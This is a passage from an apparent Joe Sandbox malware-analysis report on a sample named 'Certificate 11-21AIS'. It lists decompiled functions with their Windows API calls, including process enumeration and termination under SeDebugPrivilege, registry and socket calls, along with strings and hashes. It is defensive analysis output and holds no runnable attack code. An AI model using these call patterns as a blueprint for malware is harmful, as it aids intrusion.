                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0093DB1B
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0093DB3C
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0093DB51
                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0093DB6E
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0093DB95
                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,008DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0093DBA0
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093DBBD
                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,008DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0093DBC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                              • String ID:
                                                                              • API String ID: 1268354404-0
                                                                              • Opcode ID: e0a54dbf758cd2fc10c5bcd023be37779f4fc2f8ee3adcee8eb52e0b91a7cb1d
                                                                              • Instruction ID: 4d4f2cca9ea0e5a202e1a06a6903fd8b96de1ab4258222e7c3a56ecec890b95f
                                                                              • Opcode Fuzzy Hash: e0a54dbf758cd2fc10c5bcd023be37779f4fc2f8ee3adcee8eb52e0b91a7cb1d
                                                                              • Instruction Fuzzy Hash: CD518634611208EFDB24DF68DC91FAA77B8FB08314F200619F986D6290D7B0ED80DB51
                                                                              Function 00907555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00905FA6,?), ref: 00906EF1
                                                                                • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 009075CA
                                                                              • _wcscmp.LIBCMT ref: 009075E2
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009075FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 793581249-0
                                                                              • Opcode ID: 56d124de7aed23ca9f93a64ee8f171cacfb5d2ad5d048d261fe7fda28fae91f0
                                                                              • Instruction ID: 51c896d7760144842e16e06d849cce8b4ad0237afc4758a37e285305104fbd9a
                                                                              • Opcode Fuzzy Hash: 56d124de7aed23ca9f93a64ee8f171cacfb5d2ad5d048d261fe7fda28fae91f0
                                                                              • Instruction Fuzzy Hash: 425120B2E092195EDF60EB94DC41DDEB3BCEF49320B1044AAF605E3181EA74A6C5CF61
                                                                              Function 008DEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 008DEAEB
                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 008DEB32
                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 0093DC86
                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0093DAD1,00000004,00000000,00000000), ref: 0093DCF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 86b75f18d1c7218c3418952a344eeeee31a51e26737567e2124e18e772d2b63c
                                                                              • Instruction ID: 18bdd1e5af67c25df4e9e2785ccaeacd95c913c34b4173863a0c69c4d76d3b2a
                                                                              • Opcode Fuzzy Hash: 86b75f18d1c7218c3418952a344eeeee31a51e26737567e2124e18e772d2b63c
                                                                              • Instruction Fuzzy Hash: 1F41297422A2809AC7356B28DD9DF2A7B99FB53328F191A0FF087EA761C6707840D711
                                                                              Function 008FB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB26C
                                                                              • HeapAlloc.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB273
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008FAEF1,00000B00,?,?), ref: 008FB288
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB290
                                                                              • DuplicateHandle.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB293
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008FAEF1,00000B00,?,?), ref: 008FB2A3
                                                                              • GetCurrentProcess.KERNEL32(008FAEF1,00000000,?,008FAEF1,00000B00,?,?), ref: 008FB2AB
                                                                              • DuplicateHandle.KERNEL32(00000000,?,008FAEF1,00000B00,?,?), ref: 008FB2AE
                                                                              • CreateThread.KERNEL32(00000000,00000000,008FB2D4,00000000,00000000,00000000), ref: 008FB2C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 2cde450024a57893e6a26af7da152b82e23a382c06f88dc9e15a6af24b69d81a
                                                                              • Instruction ID: bd78c59139b5eb107dfa9635a3a0db8832d97e008739dc96e6be591bd3f61a31
                                                                              • Opcode Fuzzy Hash: 2cde450024a57893e6a26af7da152b82e23a382c06f88dc9e15a6af24b69d81a
                                                                              • Instruction Fuzzy Hash: B5011DB9255308BFE710AFA5DC4DF6B3BACEB89B04F008411FA04CB1A1CA749800DB21
                                                                              Function 0091C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: 11923c80d2f627d930e964ce45fe28f397a42b52188c0fab04e2835b0de7ba02
                                                                              • Instruction ID: 6f7864cfd3d7787221d762266a62f9d04b9ad00a69eb9116529eedfabdf3c042
                                                                              • Opcode Fuzzy Hash: 11923c80d2f627d930e964ce45fe28f397a42b52188c0fab04e2835b0de7ba02
                                                                              • Instruction Fuzzy Hash: 05E192B1B4021EABDF14DFA8D881BEE77B9EB48354F148469F905A7281D770AD81CB90
                                                                              Function 0091BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-625585964
                                                                              • Opcode ID: ace4cdbdfee3072b94825bcdf80499b8cabaf915ac4a057263023e130cff47fe
                                                                              • Instruction ID: a0ae421154452631abd0284ffc8aa1a590d4ba7ddb6e8045f54fde4bd2d726b5
                                                                              • Opcode Fuzzy Hash: ace4cdbdfee3072b94825bcdf80499b8cabaf915ac4a057263023e130cff47fe
                                                                              • Instruction Fuzzy Hash: 3091AF75A00219EBDF24CFA5D884FEEBBB9EF85710F108559F515AB290DB709980CFA0
                                                                              Function 00929A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00929B19
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00929B2D
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00929B47
                                                                              • _wcscat.LIBCMT ref: 00929BA2
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00929BB9
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00929BE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: 0d5ec75326ebbb32d697a26cd9c89f36aa97aa4e6d87b6bc733301a25f905413
                                                                              • Instruction ID: 05d37a84da57159a329df604a0c8f7dd8e93fdd27c8b3de7a7d83e75724de36c
                                                                              • Opcode Fuzzy Hash: 0d5ec75326ebbb32d697a26cd9c89f36aa97aa4e6d87b6bc733301a25f905413
                                                                              • Instruction Fuzzy Hash: CA419075A00318ABDB219FA8EC85FEE77ACEF48350F10442AF589E7291D7719D84CB60
                                                                              Function 0092172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00906532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00906554
                                                                                • Part of subcall function 00906532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00906564
                                                                                • Part of subcall function 00906532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009065F9
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092179A
                                                                              • GetLastError.KERNEL32 ref: 009217AD
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009217D9
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00921855
                                                                              • GetLastError.KERNEL32(00000000), ref: 00921860
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00921895
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 60b0b75867d18ba4c302fa75da9110b57d958f1a01cd20da2db8adb2a22fbd11
                                                                              • Instruction ID: cb450c89057f32d3fae3ba5c9d5605b471b597b7f11b29e37f655ebb97ba24cf
                                                                              • Opcode Fuzzy Hash: 60b0b75867d18ba4c302fa75da9110b57d958f1a01cd20da2db8adb2a22fbd11
                                                                              • Instruction Fuzzy Hash: C241BE75600211AFDB05EF68D8D5F6EB7A5BF64310F048459FA069F3C2DB75A900CB92
                                                                              Function 00905819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 009058B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: dfba8a3a382be6acf5394c29ddcef0121143fb79ba17e91f4fe59c7edd11c1a3
                                                                              • Instruction ID: 6572e3cf12ae935e8111a49ba0ac51cceaf7f186cfe22ecf179d0319c44c706a
                                                                              • Opcode Fuzzy Hash: dfba8a3a382be6acf5394c29ddcef0121143fb79ba17e91f4fe59c7edd11c1a3
                                                                              • Instruction Fuzzy Hash: CD113A3670D746BFE7005B559C82DAB23ACEF56324B20803AFD00E62C1FBB4EA405A65
                                                                              Function 0090A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0090A806
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafeVartype
                                                                              • String ID:
                                                                              • API String ID: 1725837607-0
                                                                              • Opcode ID: 5507c81c9f6485f2ca6a14671207e5cc573506cc8e7a5dd29feda8dba2e8d80c
                                                                              • Instruction ID: cdb341556f68b7033dfb8bf9e63e25d946610fe675255d136b231ae7c73f5b6b
                                                                              • Opcode Fuzzy Hash: 5507c81c9f6485f2ca6a14671207e5cc573506cc8e7a5dd29feda8dba2e8d80c
                                                                              • Instruction Fuzzy Hash: BBC16B75A0521ADFDB00CF98C485BAEB7F5FF09311F20846AE615E72D1D734A981CB92
                                                                              Function 00906B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00906B63
                                                                              • LoadStringW.USER32(00000000), ref: 00906B6A
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00906B80
                                                                              • LoadStringW.USER32(00000000), ref: 00906B87
                                                                              • _wprintf.LIBCMT ref: 00906BAD
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00906BCB
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00906BA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: 2dcaec80b85a136735ded40e80b1884a9a0fa97f70af36d176aa1b12d396dde6
                                                                              • Instruction ID: 3fa97985b061899fb89ceba4f0f4ab1307628e3926a5d9d82f3487411ccbbbe1
                                                                              • Opcode Fuzzy Hash: 2dcaec80b85a136735ded40e80b1884a9a0fa97f70af36d176aa1b12d396dde6
                                                                              • Instruction Fuzzy Hash: BE0186FA504208BFEB11A794DD89EFB336CD708305F0044A1B745D2041EA749E849F70
                                                                              Function 00922B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00922BF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharConnectRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 2595220575-0
                                                                              • Opcode ID: 927a579726cd52d614afca1a4ae0a35a22dba5053e8aae53f221b786bdd809d3
                                                                              • Instruction ID: bd9009a6a149a4702d3a626e13003674338ee6c5c38eb07cc84fbef199f16e07
                                                                              • Opcode Fuzzy Hash: 927a579726cd52d614afca1a4ae0a35a22dba5053e8aae53f221b786bdd809d3
                                                                              • Instruction Fuzzy Hash: 16915575204211AFCB10EF68D891F6EB7E5FF98310F04885DF9969B2A2DB35E905CB42
                                                                              Function 0091961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32 ref: 00919691
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0091969E
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009196C8
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009196E9
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009196F8
                                                                              • inet_ntoa.WSOCK32(?), ref: 00919765
                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 009197AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$htonsinet_ntoaselect
                                                                              • String ID:
                                                                              • API String ID: 500251541-0
                                                                              • Opcode ID: 31d6de4c94dc4627a150003c6a28cefe52ed5b52b637cd9ccf26e38f204b944b
                                                                              • Instruction ID: 4ca0bd091d4228ec925349d7287f9f4cad6eaccbe06fcf3121ea6b7e61bfd933
                                                                              • Opcode Fuzzy Hash: 31d6de4c94dc4627a150003c6a28cefe52ed5b52b637cd9ccf26e38f204b944b
                                                                              • Instruction Fuzzy Hash: 0171BA71608204ABC714EF68CC95FABB7A8FF85714F104A2DF5559B2A1EB30ED44CB92
                                                                              Function 008EA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __mtinitlocknum.LIBCMT ref: 008EA991
                                                                                • Part of subcall function 008E7D7C: __FF_MSGBANNER.LIBCMT ref: 008E7D91
                                                                                • Part of subcall function 008E7D7C: __NMSG_WRITE.LIBCMT ref: 008E7D98
                                                                                • Part of subcall function 008E7D7C: __malloc_crt.LIBCMT ref: 008E7DB8
                                                                              • __lock.LIBCMT ref: 008EA9A4
                                                                              • __lock.LIBCMT ref: 008EA9F0
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00976DE0,00000018,008F5E7B,?,00000000,00000109), ref: 008EAA0C
                                                                              • EnterCriticalSection.KERNEL32(8000000C,00976DE0,00000018,008F5E7B,?,00000000,00000109), ref: 008EAA29
                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 008EAA39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1422805418-0
                                                                              • Opcode ID: caa52676e19e5a8f14aea3c523ec63d4e7ad3a750e170c481d535d751af7ad42
                                                                              • Instruction ID: de1d8682530ac3a74cb40e9374662b28467d23cf3984eb0fe0892dab75598456
                                                                              • Opcode Fuzzy Hash: caa52676e19e5a8f14aea3c523ec63d4e7ad3a750e170c481d535d751af7ad42
                                                                              • Instruction Fuzzy Hash: CA413B71A147959BEB189F6ED94475CBBB0FF43B34F208228E425EB2D1D774A844CB82
                                                                              Function 00928ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00928EE4
                                                                              • GetDC.USER32(00000000), ref: 00928EEC
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00928EF7
